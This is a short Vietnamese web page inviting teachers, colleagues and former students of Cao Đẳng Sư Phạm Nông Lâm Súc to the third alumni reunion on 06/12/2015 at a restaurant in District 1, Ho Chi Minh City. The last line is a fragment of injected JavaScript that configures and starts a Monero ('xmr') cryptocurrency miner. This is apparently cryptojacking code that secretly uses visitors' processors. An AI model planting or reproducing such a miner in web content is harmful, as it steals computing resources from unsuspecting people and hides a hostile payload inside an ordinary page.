Trang chủ » Sinh hoạt họp mặt hàng năm

Thơ Mời Họp Mặt - Cao Đẳng Sư Phạm Nông Lâm Súc -

Ban liên lạc Cao Đẳng Sư phạm Nông Lâm Súc kính mời Quí Thầy Cô, các đồng nghiệp và cựu giáo sinh, về tham dự họp mặt lần thứ III vào lúc 9 giờ ngày chủ nhật 06/12/2015, địa điểm nhà hàng “Đoàn Viên” số 06 đường Huyền Trân Công Chúa phường Bến Thành, quận I, TP HCM ( phía sau dinh Độc Lập ).
', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();